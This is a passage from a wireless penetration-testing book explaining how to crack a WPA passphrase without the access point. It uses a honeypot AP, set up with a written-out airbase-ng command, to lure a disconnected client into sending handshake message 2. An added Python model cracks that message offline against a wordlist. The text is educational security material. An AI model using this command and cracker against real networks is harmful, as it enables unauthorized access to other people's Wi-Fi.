
Kali Linux Wireless Penetration Testing Essentials


Cracking WPA keys without the AP


The Caffe Latte and Hirte attacks allow us to crack a WEP key in the absence of the target AP by attacking a disconnected client.

In this section, we will see that it is also possible to crack a WPA key in the same situation.

Recall from Chapter 5, WPA/WPA2 Cracking, that to crack a WPA key we must capture a WPA four-way handshake, which gives us the parameters required to run the cracking process: the ANonce, the SNonce, the client and AP MAC addresses, and the MIC (Message Integrity Check) carried in the second EAPOL-Key message. Together with the SSID (the salt used to derive the PMK from the passphrase), these are all the inputs needed to derive a candidate PTK from a candidate passphrase and check it against the captured MIC.

It is worth noting that the handshake does not need to be completed: all of these parameters are exchanged in the first two messages, and the AP does not need to know the preshared key to send the first one. Message 1 only carries a random ANonce; it is the client that proves knowledge of the key in message 2 by sending its SNonce and a MIC computed with the derived PTK, as we can see in the following diagram:
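To make the point concrete, the following is an added example, not code from the book: it models handshake messages 1 and 2 in Python and runs the offline MIC check an attacker performs on them. The honeypot side only chooses a random ANonce and never uses the PSK; the victim client computes the PTK and MIC; the attacker then tries candidate passphrases against the captured message 2. The SSID, MAC addresses, passphrase and wordlist are constructed values, and the EAPOL-Key frame is a minimal one with an empty key-data field (the key-descriptor field layout and offsets follow the standard, but this is a model, not a parser for real captures).

```python
"""
Added example (not from the book): model of WPA four-way handshake messages 1
and 2 and the offline check that recovers the passphrase from them.
All MACs, nonces, SSID and passphrases below are constructed for illustration.
"""
import hashlib
import hmac
import os

# EAPOL header (4) + descriptor type (1) + key info (2) + key length (2)
# + replay counter (8) + nonce (32) + IV (16) + RSC (8) + key ID (8) = 81
MIC_OFFSET = 81
NONCE_OFFSET = 17  # 4 + 1 + 2 + 2 + 8


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    # 802.11i PSK derivation: PBKDF2-HMAC-SHA1, 4096 rounds, 256-bit output.
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    # PTK = PRF-512(PMK, "Pairwise key expansion",
    #               min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce))
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(4):  # 4 x 160 bits covers the 512 bits we need
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]


def build_msg2(snonce: bytes, wpa2: bool) -> bytearray:
    # Minimal EAPOL-Key frame for message 2 with the MIC field zeroed.
    # Key info: MIC flag (0x0100) | pairwise (0x0008) | descriptor version 1 (WPA) or 2 (WPA2).
    key_info = 0x010A if wpa2 else 0x0109
    body = bytes([0x02 if wpa2 else 0xFE])            # descriptor type: RSN or WPA
    body += key_info.to_bytes(2, "big")
    body += (16 if wpa2 else 32).to_bytes(2, "big")   # key length: CCMP or TKIP
    body += (1).to_bytes(8, "big")                    # replay counter
    body += snonce                                    # key nonce
    body += bytes(16) + bytes(8) + bytes(8)           # key IV, RSC, key ID
    body += bytes(16)                                 # key MIC placeholder
    body += (0).to_bytes(2, "big")                    # key data length (no RSN IE in this model)
    return bytearray(bytes([0x01, 0x03]) + len(body).to_bytes(2, "big") + body)


def compute_mic(kck: bytes, eapol: bytes, wpa2: bool) -> bytes:
    # MIC is computed over the whole EAPOL frame with the MIC field zeroed:
    # HMAC-MD5 for descriptor version 1 (WPA/TKIP), HMAC-SHA1 for version 2 (WPA2/CCMP).
    zeroed = bytearray(eapol)
    zeroed[MIC_OFFSET:MIC_OFFSET + 16] = bytes(16)
    return hmac.new(kck, bytes(zeroed), hashlib.sha1 if wpa2 else hashlib.md5).digest()[:16]


def client_msg2(passphrase: str, ssid: str, aa: bytes, spa: bytes, anonce: bytes, wpa2: bool) -> bytes:
    # Victim client: knows the PSK, answers message 1 with SNonce and a MIC.
    snonce = os.urandom(32)
    kck = prf_512(pmk_from_passphrase(passphrase, ssid), aa, spa, anonce, snonce)[:16]
    frame = build_msg2(snonce, wpa2)
    frame[MIC_OFFSET:MIC_OFFSET + 16] = compute_mic(kck, frame, wpa2)
    return bytes(frame)


def crack(ssid: str, aa: bytes, spa: bytes, anonce: bytes, msg2: bytes, wpa2: bool, candidates):
    # Attacker: everything needed is in message 1 (ANonce) and message 2 (SNonce, MIC).
    snonce = msg2[NONCE_OFFSET:NONCE_OFFSET + 32]
    mic = msg2[MIC_OFFSET:MIC_OFFSET + 16]
    for cand in candidates:
        kck = prf_512(pmk_from_passphrase(cand, ssid), aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(compute_mic(kck, msg2, wpa2), mic):
            return cand
    return None


def demo(wpa2: bool = False, candidates=None):
    ssid = "Target_Network"
    aa = bytes.fromhex("00112233aabb")   # honeypot AP MAC (constructed)
    spa = bytes.fromhex("66778899ccdd")  # client MAC (constructed)
    anonce = os.urandom(32)              # message 1: random ANonce, no PSK involved
    msg2 = client_msg2("correct horse battery", ssid, aa, spa, anonce, wpa2)
    if candidates is None:
        candidates = ["password", "letmein", "correct horse battery", "12345678"]
    return crack(ssid, aa, spa, anonce, msg2, wpa2, candidates)


if __name__ == "__main__":
    print("WPA :", demo(wpa2=False))
    print("WPA2:", demo(wpa2=True))
```

The honeypot code path (`anonce = os.urandom(32)`) is the whole of what the fake AP contributes; the rest of the work is done by the client, which is why a disconnected client probing for a known SSID is enough to obtain a crackable handshake.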

Therefore, we can set up a honeypot AP running WPA with the same SSID as the target network, using the following command:

airbase-ng -c 1 -e Target_Network -F wpa -z 2 -W 1 mon0

Here, the -z option stands for WPA and the value...